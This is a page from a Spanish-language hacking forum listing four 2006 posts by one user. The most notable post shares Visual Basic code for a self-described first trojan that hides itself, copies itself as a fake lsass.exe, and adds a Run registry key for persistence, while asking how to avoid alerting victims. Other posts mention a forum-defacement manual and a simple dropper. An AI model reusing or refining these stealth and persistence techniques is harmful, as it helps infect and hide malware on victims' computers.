elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: 1 2 3 4 [5]
41  Programación / Programación Visual Basic / Problema: el registro me pide confirmación =( en: 29 Junio 2006, 01:03 am
Hola a tod@s:

Weno de una vez por todas me he decidido a programar mi primer troyano en VB  ;D. Ya lo tengo
practicamente acabado, pero se me ha presentado un problemilla al modificar el registro.
Este es un trozo del codigo, el q lo añade al registro:

Código:
Private Sub Timer2_Timer()
On Error Resume Next
App.TaskVisible = False ' Lo hace invisible
Shell txt.Text 'Añade al registro
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\lsass.exe" ' Lo copia
Timer2.Enabled = False
End Sub

txt es el nombre que le he dado a un cuadro de texto q contiene lo siguiente:

Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinTray /t REG_SZ /d "C:\windows\lsass.exe"

Hasta aqui todo me funciona perfectamente, el problema se me plantea cuando reinicio mi Pc, pues
me sale una ventana de MS-DOS diciendome q la clave WinTray ya existe y que si quiero sustituirla,
lo cual llama un poco la atención de cara a infectar una posible víctima.

A alguien se le ocurre alguna idea para arreglar esto?????

Desde ya muxas gracias y 1 saludo
42  Programación / Programación Visual Basic / Mover un form con un label en: 18 Junio 2006, 11:18 am
Hola a todos

Veran he creado una calculadora y ahora estoy dandola una apariencia grafica un poco personalizada, pa q quede mas bonita ;D, y claro tambien quiero quitar la barra q tienen arriba todos los programas.

Hasta aqui lo ago todo sin problemas pero cuando sustitullo la barra por un label, logicamente, no puedo mover el formulario por la pantalla, se me queda hay parado.

Mi duda es ¿cómo puedo hacer para que ese label actue como si fuera la barra de windows? :huh:

Gracias de antemano por su ayuda.

Salu2
43  Informática / Tutoriales - Documentación / Seguridad en los foros (o falta de ella) en: 15 Junio 2006, 15:57 pm
Hola a todos:

Acontinuación voy a colgar un pequeño manual en el que se explica como aprovechar los numeros bug's con los que cuentan muchos foros y asi entender como algunas personas llegan a hacer un "deface".

Espero que tras leerlo no comenceis a jorobar los foros de todo el mundo (eso es algo realmente estupido) este manual SOLO vale para aprender.

Hiré ampliando la información segun pueda, y os invito a colaborar y colgar los agujeros de seguridad que conozcais par hacer asi entre todos un buen manual.

Salu2
44  Programación / Programación Visual Basic / Programilla de instalacion (muy simple) en: 22 Abril 2006, 14:21 pm
Hola creo q mi duda es muy simple asi q espero q me la puedan resolver:
lo q yo quiero es crear un programa q al ser ejecutado guarde en una direccion del ordenador un archivo que iria adjunto a el y lo ejecute
Muchas gracias a todos

salu2 :rolleyes:
Páginas: 1 2 3 4 [5]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines